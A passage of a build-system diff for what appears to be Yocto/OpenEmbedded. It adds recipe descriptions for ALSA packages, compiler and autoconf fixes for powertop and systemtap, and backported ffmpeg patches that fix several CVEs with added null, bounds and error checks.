+Date: Thu, 15 Apr 2021 11:45:13 +0100
+Subject: [PATCH] configure: Use AX_REQUIRE_DEFINED
+
+Require additional macros to be defined early, to avoid an aclocal
+"too many loops" error when copying macros.
+
+Upstream-Status: Backport from tip
+
+Signed-off-by: Tim Orling <ticotimo@gmail.com>
+---
+ configure.ac | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/configure.ac b/configure.ac
+index d68369c..b90831b 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -29,6 +29,9 @@ AM_GNU_GETTEXT([external])
+ AM_GNU_GETTEXT_VERSION([0.18.2])
+ 
+ m4_ifdef([AM_PROG_AR], [AM_PROG_AR])
++AX_REQUIRE_DEFINED([AX_ADD_FORTIFY_SOURCE])
++AX_REQUIRE_DEFINED([AX_CXX_COMPILE_STDCXX])
++AX_REQUIRE_DEFINED([AX_PTHREAD])
+ # Checks for programs.
+ AC_PROG_CPP
+ AC_PROG_CXX
diff --git a/meta/recipes-kernel/powertop/powertop_2.10.bb b/meta/recipes-kernel/powertop/powertop_2.10.bb
index f1b0e92b2b..dcbba2fd5c 100644
--- a/meta/recipes-kernel/powertop/powertop_2.10.bb
+++ b/meta/recipes-kernel/powertop/powertop_2.10.bb
@@ -2,13 +2,15 @@ SUMMARY = "Power usage tool"
 DESCRIPTION = "Linux tool to diagnose issues with power consumption and power management."
 HOMEPAGE = "https://01.org/powertop/"
 BUGTRACKER = "https://app.devzing.com/powertopbugs/bugzilla"
-DEPENDS = "ncurses libnl pciutils"
+DEPENDS = "ncurses libnl pciutils autoconf-archive"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e"
 
-SRC_URI = "git://github.com/fenrus75/powertop;protocol=https \
-    file://0001-wakeup_xxx.h-include-limits.h.patch \
-"
+SRC_URI = "git://github.com/fenrus75/powertop;protocol=https;branch=master \
+           file://0001-wakeup_xxx.h-include-limits.h.patch \
+           file://0002-configure.ac-ax_add_fortify_source.patch \
+           file://0003-configure-Use-AX_REQUIRE_DEFINED.patch \
+           "
 SRCREV = "e8765b5475b22b7a2b6e9e8a031c68a268a0b0b3"
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb b/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
index 46820ef489..6ee0be5e3e 100644
--- a/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
+++ b/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
@@ -1,5 +1,5 @@
 SUMMARY = "UProbes kernel module for SystemTap"
-
+HOMEPAGE = "https://sourceware.org/systemtap/"
 require systemtap_git.inc
 
 DEPENDS = "systemtap virtual/kernel"
diff --git a/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch b/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch
new file mode 100644
index 0000000000..f885c44460
--- /dev/null
+++ b/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch
@@ -0,0 +1,49 @@
+From f199d1982ef8a6c6d5c06c082d057b8793bcc6aa Mon Sep 17 00:00:00 2001
+From: Serhei Makarov <serhei@serhei.io>
+Date: Fri, 21 Jan 2022 18:21:46 -0500
+Subject: [PATCH] gcc12 c++ compatibility re-tweak for rhel6: use function
+ pointer instead of lambdas instead of ptr_fun<>
+
+Saving 2 lines in ltrim/rtrim is probably not a good reason to drop
+compatibility with the RHEL6 system compiler.  Actually declaring a
+named function and passing the function pointer is compatible with
+everything.
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=systemtap.git;a=commit;h=f199d1982ef8a6c6d5c06c082d057b8793bcc6aa]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ util.cxx | 13 ++++++++-----
+ 1 file changed, 8 insertions(+), 5 deletions(-)
+
+--- a/util.cxx
++++ b/util.cxx
+@@ -1757,21 +1757,24 @@ flush_to_stream (const string &fname, os
+   return 1; // Failure
+ }
+ 
++int
++not_isspace(unsigned char c)
++{
++  return !std::isspace(c);
++}
++
+ // trim from start (in place)
+ void
+ ltrim(std::string &s)
+ {
+-  s.erase(s.begin(),
+-	  std::find_if(s.begin(), s.end(),
+-		       std::not1(std::ptr_fun<int, int>(std::isspace))));
++  s.erase(s.begin(), std::find_if(s.begin(), s.end(), not_isspace));
+ }
+ 
+ // trim from end (in place)
+ void
+ rtrim(std::string &s)
+ {
+-  s.erase(std::find_if(s.rbegin(), s.rend(),
+-	  std::not1(std::ptr_fun<int, int>(std::isspace))).base(), s.end());
++  s.erase(std::find_if(s.rbegin(), s.rend(), not_isspace).base(), s.end());
+ }
+ 
+ // trim from both ends (in place)
diff --git a/meta/recipes-kernel/systemtap/systemtap_git.bb b/meta/recipes-kernel/systemtap/systemtap_git.bb
index 1c9f2aed16..a8b2cf1eac 100644
--- a/meta/recipes-kernel/systemtap/systemtap_git.bb
+++ b/meta/recipes-kernel/systemtap/systemtap_git.bb
@@ -1,9 +1,14 @@
 SUMMARY = "Script-directed dynamic tracing and performance analysis tool for Linux"
+DESCRIPTION = "It provides free software infrastructure to simplify the \
+gathering of information about the running Linux system. This assists \
+diagnosis of a performance or functional problem."
 HOMEPAGE = "https://sourceware.org/systemtap/"
 
 require systemtap_git.inc
 
-SRC_URI += "file://0001-improve-reproducibility-for-c-compiling.patch"
+SRC_URI += "file://0001-improve-reproducibility-for-c-compiling.patch \
+            file://0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch \
+           "
 
 DEPENDS = "elfutils"
 
diff --git a/meta/recipes-kernel/systemtap/systemtap_git.inc b/meta/recipes-kernel/systemtap/systemtap_git.inc
index 116e83fe0f..af55f15fd4 100644
--- a/meta/recipes-kernel/systemtap/systemtap_git.inc
+++ b/meta/recipes-kernel/systemtap/systemtap_git.inc
@@ -3,7 +3,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 SRCREV = "044a0640985ef007c0b2fb6eaf660d9d51800cda"
 PV = "4.2"
 
-SRC_URI = "git://sourceware.org/git/systemtap.git \
+SRC_URI = "git://sourceware.org/git/systemtap.git;branch=master \
            file://0001-Do-not-let-configure-write-a-python-location-into-th.patch \
            file://0001-Install-python-modules-to-correct-library-dir.patch \
            file://0001-staprun-stapbpf-don-t-support-installing-a-non-root.patch \
diff --git a/meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.04.29.bb b/meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb
index 30d4cb523f..6489bc90d9 100644
--- a/meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.04.29.bb
+++ b/meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb
@@ -5,7 +5,7 @@ LICENSE = "ISC"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=07c4f6dea3845b02a18dc00c8c87699c"
 
 SRC_URI = "https://www.kernel.org/pub/software/network/${BPN}/${BP}.tar.xz"
-SRC_URI[sha256sum] = "89fd031aed5977c219a71501e144375a10e7c90d1005d5d086ea7972886a2c7a"
+SRC_URI[sha256sum] = "c8a61c9acf76fa7eb4239e89f640dee3e87098d9f69b4d3518c9c60fc6d20c55"
 
 inherit bin_package allarch
 
@@ -13,7 +13,7 @@ do_install() {
     install -d -m0755 ${D}${nonarch_libdir}/crda
     install -d -m0755 ${D}${sysconfdir}/wireless-regdb/pubkeys
     install -m 0644 regulatory.bin ${D}${nonarch_libdir}/crda/regulatory.bin
-    install -m 0644 sforshee.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/sforshee.key.pub.pem
+    install -m 0644 wens.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/wens.key.pub.pem
 
     install -m 0644 -D regulatory.db ${D}${nonarch_base_libdir}/firmware/regulatory.db
     install -m 0644 regulatory.db.p7s ${D}${nonarch_base_libdir}/firmware/regulatory.db.p7s
diff --git a/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb b/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
index e2bc61fbe9..4867c798b9 100644
--- a/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
+++ b/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
@@ -1,4 +1,6 @@
 SUMMARY = "ALSA sound library"
+DESCRIPTION = "(Occasionally a.k.a. libasound) is a userspace library that \
+provides a level of abstraction over the /dev interfaces provided by the kernel modules."
 HOMEPAGE = "http://www.alsa-project.org"
 BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
 SECTION = "libs/multimedia"
diff --git a/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
index 61d394b0f0..8205982fcc 100644
--- a/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
@@ -1,4 +1,7 @@
 SUMMARY = "ALSA Plugins"
+DESCRIPTION = "Used to create virtual devices that can be used like normal \
+hardware devices but cause extra processing of the sound stream to take place. \
+They are used while configuring ALSA in the .asoundrc file."
 HOMEPAGE = "http://alsa-project.org"
 BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
 SECTION = "multimedia"
@@ -33,7 +36,7 @@ PACKAGECONFIG ??= "\
         speexdsp \
         ${@bb.utils.filter('DISTRO_FEATURES', 'pulseaudio', d)} \
 "
-PACKAGECONFIG[aaf] = "--enable-aaf,--disable-aaf,avtp"
+PACKAGECONFIG[aaf] = "--enable-aaf,--disable-aaf,libavtp"
 PACKAGECONFIG[jack] = "--enable-jack,--disable-jack,jack"
 PACKAGECONFIG[libav] = "--enable-libav,--disable-libav,libav"
 PACKAGECONFIG[maemo-plugin] = "--enable-maemo-plugin,--disable-maemo-plugin"
diff --git a/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb b/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
index c1f4acdb03..c979d7642e 100644
--- a/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
+++ b/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
@@ -1,4 +1,7 @@
 SUMMARY = "Advanced tools for certain ALSA sound card drivers"
+DESCRIPTION = "Package containing a number of tools ranging from envy24control \
+which provides complete control over all devices with an envy24 chip, to \
+firmware loaders for pcmcia, USB and the hdsp devices."
 HOMEPAGE = "http://www.alsa-project.org"
 BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
 SECTION = "console/utils"
diff --git a/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
index 5101cc7b7a..2ff5494c99 100644
--- a/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
@@ -1,4 +1,7 @@
 SUMMARY = "ALSA topology configuration files"
+DESCRIPTION = "Provides a method for audio drivers to load their mixers, \
+routing, PCMs and capabilities from user space at runtime without changing \
+any driver source code."
 HOMEPAGE = "https://alsa-project.org"
 BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking"
 LICENSE = "BSD-3-Clause"
diff --git a/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb b/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
index a432d5de07..ee1688b421 100644
--- a/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
+++ b/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
@@ -1,4 +1,7 @@
 SUMMARY = "ALSA Use Case Manager configuration"
+DESCRIPTION = "This package contains ALSA Use Case Manager configuration \
+of audio input/output names and routing for specific audio hardware. \
+They can be used with the alsaucm tool. "
 HOMEPAGE = "https://alsa-project.org"
 BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking"
 LICENSE = "BSD-3-Clause"
diff --git a/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
index 1dc30f377b..54aa2f9544 100644
--- a/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
@@ -1,4 +1,6 @@
 SUMMARY = "ALSA sound utilities"
+DESCRIPTION = "collection of small and often extremely powerful applications \
+designed to allow users to control the various parts of the ALSA system."
 HOMEPAGE = "http://www.alsa-project.org"
 BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
 SECTION = "console/utils"
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch
new file mode 100644
index 0000000000..3b503c49c9
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch
@@ -0,0 +1,97 @@
+From 24a58d70cbb3997e471366bd5afe54be9007bfb1 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 15:32:14 +0000
+Subject: [PATCH] libavutil: include assembly with full path from source root
+
+Otherwise nasm writes the full host-specific paths into .o
+output, which breaks binary reproducibility.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ libavutil/x86/cpuid.asm      | 2 +-
+ libavutil/x86/emms.asm       | 2 +-
+ libavutil/x86/fixed_dsp.asm  | 2 +-
+ libavutil/x86/float_dsp.asm  | 2 +-
+ libavutil/x86/lls.asm        | 2 +-
+ libavutil/x86/pixelutils.asm | 2 +-
+ 6 files changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/libavutil/x86/cpuid.asm b/libavutil/x86/cpuid.asm
+index c3f7866..766f77f 100644
+--- a/libavutil/x86/cpuid.asm
++++ b/libavutil/x86/cpuid.asm
+@@ -21,7 +21,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+ 
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+ 
+ SECTION .text
+ 
+diff --git a/libavutil/x86/emms.asm b/libavutil/x86/emms.asm
+index 8611762..df84f22 100644
+--- a/libavutil/x86/emms.asm
++++ b/libavutil/x86/emms.asm
+@@ -18,7 +18,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+ 
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+ 
+ SECTION .text
+ 
+diff --git a/libavutil/x86/fixed_dsp.asm b/libavutil/x86/fixed_dsp.asm
+index 979dd5c..2f41185 100644
+--- a/libavutil/x86/fixed_dsp.asm
++++ b/libavutil/x86/fixed_dsp.asm
+@@ -20,7 +20,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+ 
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+ 
+ SECTION .text
+ 
+diff --git a/libavutil/x86/float_dsp.asm b/libavutil/x86/float_dsp.asm
+index 517fd63..b773e61 100644
+--- a/libavutil/x86/float_dsp.asm
++++ b/libavutil/x86/float_dsp.asm
+@@ -20,7 +20,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+ 
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+ 
+ SECTION_RODATA 32
+ pd_reverse: dd 7, 6, 5, 4, 3, 2, 1, 0
+diff --git a/libavutil/x86/lls.asm b/libavutil/x86/lls.asm
+index 317fba6..d2526d1 100644
+--- a/libavutil/x86/lls.asm
++++ b/libavutil/x86/lls.asm
+@@ -20,7 +20,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+ 
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+ 
+ SECTION .text
+ 
+diff --git a/libavutil/x86/pixelutils.asm b/libavutil/x86/pixelutils.asm
+index 36c57c5..8b45ead 100644
+--- a/libavutil/x86/pixelutils.asm
++++ b/libavutil/x86/pixelutils.asm
+@@ -21,7 +21,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+ 
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+ 
+ SECTION .text
+ 
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch
new file mode 100644
index 0000000000..abfc024820
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch
@@ -0,0 +1,61 @@
+From 3bce9e9b3ea35c54bacccc793d7da99ea5157532 Mon Sep 17 00:00:00 2001
+From: Paul B Mahol <onemda@gmail.com>
+Date: Mon, 27 Jan 2020 21:53:08 +0100
+Subject: [PATCH] avformat/tty: add probe function
+
+CVE: CVE-2021-3566
+Signed-off-by: Saloni Jain <salonij@kpit.com>
+
+Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=3bce9e9b3ea35c54bacccc793d7da99ea5157532]
+Comment: No changes/refreshing done.
+---
+ libavformat/tty.c | 21 ++++++++++++++++++++-
+ 1 file changed, 20 insertions(+), 1 deletion(-)
+
+diff --git a/libavformat/tty.c b/libavformat/tty.c
+index 8d48f2c45c12..60f7e9f87ee7 100644
+--- a/libavformat/tty.c
++++ b/libavformat/tty.c
+@@ -34,6 +34,13 @@
+ #include "internal.h"
+ #include "sauce.h"
+ 
++static int isansicode(int x)
++{
++    return x == 0x1B || x == 0x0A || x == 0x0D || (x >= 0x20 && x < 0x7f);
++}
++
++static const char tty_extensions[31] = "ans,art,asc,diz,ice,nfo,txt,vt";
++
+ typedef struct TtyDemuxContext {
+     AVClass *class;
+     int chars_per_frame;
+@@ -42,6 +49,17 @@ typedef struct TtyDemuxContext {
+     AVRational framerate; /**< Set by a private option. */
+ } TtyDemuxContext;
+ 
++static int read_probe(const AVProbeData *p)
++{
++    int cnt = 0;
++
++    for (int i = 0; i < p->buf_size; i++)
++        cnt += !!isansicode(p->buf[i]);
++
++    return (cnt * 100LL / p->buf_size) * (cnt > 400) *
++        !!av_match_ext(p->filename, tty_extensions);
++}
++
+ /**
+  * Parse EFI header
+  */
+@@ -153,8 +171,9 @@ AVInputFormat ff_tty_demuxer = {
+     .name           = "tty",
+     .long_name      = NULL_IF_CONFIG_SMALL("Tele-typewriter"),
+     .priv_data_size = sizeof(TtyDemuxContext),
++    .read_probe     = read_probe,
+     .read_header    = read_header,
+     .read_packet    = read_packet,
+-    .extensions     = "ans,art,asc,diz,ice,nfo,txt,vt",
++    .extensions     = tty_extensions,
+     .priv_class     = &tty_demuxer_class,
+ };
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch
new file mode 100644
index 0000000000..e5be985fc3
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch
@@ -0,0 +1,53 @@
+From e01d306c647b5827102260b885faa223b646d2d1 Mon Sep 17 00:00:00 2001
+From: James Almer <jamrial@gmail.com>
+Date: Wed, 21 Jul 2021 01:02:44 -0300
+Subject: [PATCH] avcodec/utils: don't return negative values in
+ av_get_audio_frame_duration()
+
+In some extrme cases, like with adpcm_ms samples with an extremely high channel
+count, get_audio_frame_duration() may return a negative frame duration value.
+Don't propagate it, and instead return 0, signaling that a duration could not
+be determined.
+
+CVE: CVE-2021-3566
+Fixes ticket #9312
+Signed-off-by: James Almer <jamrial@gmail.com>
+Signed-off-by: Saloni Jain <salonij@kpit.com>
+
+Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=e01d306c647b5827102260b885faa223b646d2d1]
+Comment: No changes/refreshing done.
+---
+ libavcodec/utils.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/libavcodec/utils.c b/libavcodec/utils.c
+index 5fad782f5a..cfc07cbcb8 100644
+--- a/libavcodec/utils.c
++++ b/libavcodec/utils.c
+@@ -810,20 +810,22 @@ static int get_audio_frame_duration(enum AVCodecID id, int sr, int ch, int ba,
+ 
+ int av_get_audio_frame_duration(AVCodecContext *avctx, int frame_bytes)
+ {
+-    return get_audio_frame_duration(avctx->codec_id, avctx->sample_rate,
++    int duration = get_audio_frame_duration(avctx->codec_id, avctx->sample_rate,
+                                     avctx->channels, avctx->block_align,
+                                     avctx->codec_tag, avctx->bits_per_coded_sample,
+                                     avctx->bit_rate, avctx->extradata, avctx->frame_size,
+                                     frame_bytes);
++    return FFMAX(0, duration);
+ }
+ 
+ int av_get_audio_frame_duration2(AVCodecParameters *par, int frame_bytes)
+ {
+-    return get_audio_frame_duration(par->codec_id, par->sample_rate,
++    int duration = get_audio_frame_duration(par->codec_id, par->sample_rate,
+                                     par->channels, par->block_align,
+                                     par->codec_tag, par->bits_per_coded_sample,
+                                     par->bit_rate, par->extradata, par->frame_size,
+                                     frame_bytes);
++    return FFMAX(0, duration);
+ }
+ 
+ #if !HAVE_THREADS
+-- 
+2.20.1
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch
new file mode 100644
index 0000000000..bd8a08a216
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch
@@ -0,0 +1,36 @@
+From: Michael Niedermayer <michael@niedermayer.cc>
+Date: Sun, 27 Feb 2022 14:43:04 +0100
+Subject: [PATCH] avcodec/g729_parser: Check channels
+
+Fixes: signed integer overflow: 10 * 808464428 cannot be represented in type 'int'
+Fixes: assertion failure
+Fixes: ticket9651
+
+Reviewed-by: Paul B Mahol <onemda@gmail.com>
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+(cherry picked from commit 757da974b21833529cc41bdcc9684c29660cdfa8)
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+
+CVE: CVE-2022-1475
+Upstream-Status: Backport [https://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=e9e2ddbc6c78cc18b76093617f82c920e58a8d1f]
+Comment: Patch is refreshed as per ffmpeg codebase
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+---
+ libavcodec/g729_parser.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+Index: ffmpeg-4.2.2/libavcodec/g729_parser.c
+===================================================================
+--- a/libavcodec/g729_parser.c
++++ b/libavcodec/g729_parser.c
+@@ -48,6 +48,9 @@ static int g729_parse(AVCodecParserConte
+         av_assert1(avctx->codec_id == AV_CODEC_ID_G729);
+         /* FIXME: replace this heuristic block_size with more precise estimate */
+         s->block_size = (avctx->bit_rate < 8000) ? G729D_6K4_BLOCK_SIZE : G729_8K_BLOCK_SIZE;
++        // channels > 2 is invalid, we pass the packet on unchanged
++        if (avctx->channels > 2)
++            s->block_size = 0;
+         s->block_size *= avctx->channels;
+         s->duration   = avctx->frame_size;
+     }
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch
new file mode 100644
index 0000000000..febf49cff2
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch
@@ -0,0 +1,41 @@
+From 656cb0450aeb73b25d7d26980af342b37ac4c568 Mon Sep 17 00:00:00 2001
+From: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Date: Tue, 15 Feb 2022 17:58:08 +0800
+Subject: [PATCH] avcodec/vp3: Add missing check for av_malloc
+
+Since the av_malloc() may fail and return NULL pointer,
+it is needed that the 's->edge_emu_buffer' should be checked
+whether the new allocation is success.
+
+Fixes: d14723861b ("VP3: fix decoding of videos with stride > 2048")
+
+CVE: CVE-2022-3109
+Upstream-Status: Backport [https://github.com/FFmpeg/FFmpeg/commit/656cb0450aeb73b25d7d26980af342b37ac4c568]
+Comments: Refreshed hunk
+
+Reviewed-by: Peter Ross <pross@xvid.org>
+Signed-off-by: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ libavcodec/vp3.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/libavcodec/vp3.c b/libavcodec/vp3.c
+index e9ab54d73677..e2418eb6fa04 100644
+--- a/libavcodec/vp3.c
++++ b/libavcodec/vp3.c
+@@ -2740,8 +2740,13 @@
+     if (ff_thread_get_buffer(avctx, &s->current_frame, AV_GET_BUFFER_FLAG_REF) < 0)
+         goto error;
+ 
+-    if (!s->edge_emu_buffer)
++    if (!s->edge_emu_buffer) {
+         s->edge_emu_buffer = av_malloc(9 * FFABS(s->current_frame.f->linesize[0]));
++        if (!s->edge_emu_buffer) {
++            ret = AVERROR(ENOMEM);
++            goto error;
++        }
++    }
+ 
+     if (s->keyframe) {
+         if (!s->theora) {
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch
new file mode 100644
index 0000000000..fcbd9b3e1b
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch
@@ -0,0 +1,67 @@
+From 9cf652cef49d74afe3d454f27d49eb1a1394951e Mon Sep 17 00:00:00 2001
+From: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Date: Wed, 23 Feb 2022 10:31:59 +0800
+Subject: [PATCH] avformat/nutdec: Add check for avformat_new_stream
+
+Check for failure of avformat_new_stream() and propagate
+the error code.
+
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+
+CVE: CVE-2022-3341
+
+Upstream-Status: Backport [https://github.com/FFmpeg/FFmpeg/commit/9cf652cef49d74afe3d454f27d49eb1a1394951e]
+
+Comments: Refreshed Hunk
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ libavformat/nutdec.c | 16 ++++++++++++----
+ 1 file changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/libavformat/nutdec.c b/libavformat/nutdec.c
+index 0a8a700acf..f9ad2c0af1 100644
+--- a/libavformat/nutdec.c
++++ b/libavformat/nutdec.c
+@@ -351,8 +351,12 @@ static int decode_main_header(NUTContext *nut)
+         ret = AVERROR(ENOMEM);
+         goto fail;
+     }
+-    for (i = 0; i < stream_count; i++)
+-        avformat_new_stream(s, NULL);
++    for (i = 0; i < stream_count; i++) {
++        if (!avformat_new_stream(s, NULL)) {
++            ret = AVERROR(ENOMEM);
++            goto fail;
++        }
++    }
+ 
+     return 0;
+ fail:
+@@ -793,19 +793,23 @@
+     NUTContext *nut = s->priv_data;
+     AVIOContext *bc = s->pb;
+     int64_t pos;
+-    int initialized_stream_count;
++    int initialized_stream_count, ret;
+ 
+     nut->avf = s;
+ 
+     /* main header */
+     pos = 0;
++    ret = 0;
+     do {
++        if (ret == AVERROR(ENOMEM))
++            return ret;
++
+         pos = find_startcode(bc, MAIN_STARTCODE, pos) + 1;
+         if (pos < 0 + 1) {
+             av_log(s, AV_LOG_ERROR, "No main startcode found.\n");
+             goto fail;
+         }
+-    } while (decode_main_header(nut) < 0);
++    } while ((ret = decode_main_header(nut)) < 0);
+ 
+     /* stream headers */
+     pos = 0;
+
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch
new file mode 100644
index 0000000000..707073709a
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch
@@ -0,0 +1,136 @@
+From d4b7b3c03ee2baf0166ce49dff17ec9beff684db Mon Sep 17 00:00:00 2001
+From: Anton Khirnov <anton@khirnov.net>
+Date: Fri, 2 Sep 2022 22:21:27 +0200
+Subject: [PATCH] lavc/pthread_frame: avoid leaving stale hwaccel state in
+ worker threads
+
+This state is not refcounted, so make sure it always has a well-defined
+owner.
+
+Remove the block added in 091341f2ab5bd35ca1a2aae90503adc74f8d3523, as
+this commit also solves that issue in a more general way.
+
+(cherry picked from commit cc867f2c09d2b69cee8a0eccd62aff002cbbfe11)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+(cherry picked from commit 35aa7e70e7ec350319e7634a30d8d8aa1e6ecdda)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+(cherry picked from commit 3bc28e9d1ab33627cea3c632dd6b0c33e22e93ba)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+
+CVE: CVE-2022-48434
+Upstream-Status: Backport [https://git.ffmpeg.org/gitweb/ffmpeg.git/commit/d4b7b3c03ee2baf0166ce49dff17ec9beff684db]
+Signed-off-by: Ranjitsinh Rathod ranjitsinh.rathod@kpit.com
+Comment: Hunk#6 refreshed to backport changes and other to remove patch-fuzz warnings
+---
